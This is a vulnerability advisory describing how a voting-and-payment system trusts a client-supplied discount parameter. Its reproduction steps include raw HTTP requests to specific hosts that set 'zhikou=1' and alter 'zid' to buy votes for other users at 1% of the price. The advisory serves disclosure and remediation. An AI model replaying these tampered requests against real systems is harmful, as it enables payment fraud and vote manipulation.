## Security Advisory: Incorrect Access Control in XiaozhangBang Voluntary Like System V8.8 ### Summary An Incorrect Access Control vulnerability has been identified in XiaozhangBang Voluntary Like System V8.8. The application fails to properly enforce server-side access control checks on critical parameters during the voting payment process. Specifically, the **zhikou** (discount) parameter can be modified by the client without validation, allowing unauthorized discounts and manipulation of the vote-purchasing mechanism. Additionally, an attacker can manipulate the **zid** parameter to influence purchases made by other users, further amplifying the impact. ### Affected Product - Vendor: XiaozhangBang - Product: Voluntary Like System - Version: V8.8 (and possibly earlier versions) - Component: Voting / Payment Module ### Impact - Financial Loss: Unauthorized discounts lead to significant revenue loss. - Integrity Violation: Attackers can unfairly manipulate vote counts for themselves and other users. ### CVSS v3.1 Score - Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - Base Score: 7.1 (High) ### Reproduction Steps #### Step 1 - Purchase Votes An attacker modifies the **zhikou** parameter in the payment request. For example, changing **zhikou=100** (full price) to **zhikou=1** results in an unauthorized discount of 99%, effectively allowing the purchase at only 0.01 of the original price (e.g. 200 RMB reduced to 2 RMB). By also modifying the **zid** parameter, the attacker can manipulate purchases for other users. ```http POST /topfirst.php?g=Wap&m=Pay&a=wechat&token=6fK5tvIPejkkD9xm&id=3460&zid=183803 HTTP/1.1 Host: 444-2.gsthtlj.com Content-Type: application/x-www-form-urlencoded price=10&orderName=%E4%8A%BA%E6%B0%94%E7%A5%A8&num=20&zhikou=1&lid=595&vote=30&vid=3460&uid=183803 ``` #### Step 2 - WeChat Pay The manipulated order is processed by the payment gateway with the unauthorized discounted price. ```http GET /topfirst.php?g=Wap&m=Pay&a=wechat&token=6fK5tvIPejkkD9xm&id=3460&zid=183803&code=071Iiz1006uI HTTP/1.1 Host: 444-2.gsthtlj.com ``` #### Step 3 - Payment Confirmation The system confirms the payment and grants the attacker votes at the manipulated cost: ```http GET /topfirst.php?g=Wap&m=Pay&a=success&no=wz2025082118381261957652541019 HTTP/1.1 Host: 534534.down444.zqkj1688.net.cn ``` ### Remediation - Enforce strict server-side access control for all pricing and discount parameters. - Do not rely on client-supplied values such as **zhikou** to calculate transaction amounts. ### Timeline - 2025-08-21: Vulnerability discovered and verified. - 2025-08-24: Public disclosure prepared. ### References - CWE-284 (Improper Access Control): https://cwe.mitre.org/data/definitions/284.html - CWE-285 (Improper Authorization): https://cwe.mitre.org/data/definitions/285.html